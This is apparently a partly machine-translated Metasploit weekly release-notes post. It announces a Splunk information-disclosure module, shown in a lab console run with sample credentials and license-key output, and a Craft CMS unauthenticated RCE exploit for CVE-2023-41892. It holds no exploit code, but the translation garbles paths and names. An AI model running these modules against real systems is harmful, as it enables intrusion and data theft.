最后更新于2024年1月17日(星期三)21:35:10 GMT

New module content (2)

Splunk __raw服务器信息披露

作者:KOF2002, h00die, n00bhaxor
Type: Auxiliary
Pull request: #18635 contributed by n00bhaxor
Path: 收集/ splunk_raw_server_info

描述:此PR为经过身份验证的Splunk信息泄露漏洞添加了一个模块. 该模块收集有关主机和Splunk安装的信息,包括操作系统版本, build, CPU arch, Splunk license keys, etc.

[msf](Jobs:0 Agents:0) > use auxiliary/收集/ splunk_raw_server_info 
[msf](Jobs:0 Agents:0) auxiliary(收集/ splunk_raw_server_info) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
[msf](Jobs:0 Agents:0) auxiliary(收集/ splunk_raw_server_info) > set username admin
username => admin
[msf](Jobs:0 Agents:0) auxiliary(收集/ splunk_raw_server_info) > set password splunksplunk
password => splunksplunk
[msf](Jobs:0 Agents:0) auxiliary(收集/ splunk_raw_server_info) > set verbose true
verbose => true
[msf](Jobs:0 Agents:0) auxiliary(收集/ splunk_raw_server_info) > run
[*]运行模块对127.0.0.1
[+]输出保存到/root/.msf4 /战利品/ 20231220204049 _default_127.0.0.1_splunk.system.st_943292.json
[+]主机名:523a845e8652
[+] CPU架构:x86_64
操作系统:Linux
[+] OS Build: #1 SMP PREEMPT_DYNAMIC Debian 6.5.6-1kali1 (2023-10-09)
[+] OS Version: 6.5.0-kali3-amd64
[+] Splunk Version: 7.1.0
[+] Trial Version?: false
[+] Splunk Forwarder?: false
[+] Splunk产品类型:Splunk
[+] License State: OK
[+]许可密钥:[" ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff "]
[+] Splunk服务器角色:["indexer", "license_master"]
[+] Splunk Server启动时间:2023-12-21 01:40:02
[*]辅助模块执行完成

制作CMS未经认证的远程代码执行(RCE)

作者:Thanh, chybeta和h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #18612 contributed by h00die-gr3y
Path: linux / http / craftcms_unauth_rce_cve_2023_41892

描述:这增加了一个利用在CraftCMS版本4之间的远程代码执行漏洞的利用模块.0.0-RC1 and 4.4.14. 此漏洞被识别为CVE-2023-41892,允许未经身份验证的攻击者远程执行任意代码.

增强功能和特性(2)

  • #18610 from sjanusz-r7 —此PR默认启用Metasploit负载警告功能. 当启用Metasploit时,它将输出关于丢失Metasploit有效负载的警告, 例如,如果它们被杀毒软件删除.
  • #18632 from jvoisin -此PR增加了对Glibc可调特权升级模块的改进. 如果目标上没有文件命令,模块将尝试使用 readelf command to get the ld.因此,构建ID并确定目标是否与该漏洞兼容.

Documentation

您可以在我们的网站上找到最新的Metasploit文档 docs.metasploit.com.

Get it

与往常一样,您可以使用 msfupdate
自上一篇博文以来,你可以从
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (主分支)为最新.
要安装fresh而不使用git,您可以使用open-source-only Nightly Installers or the
commercial edition Metasploit Pro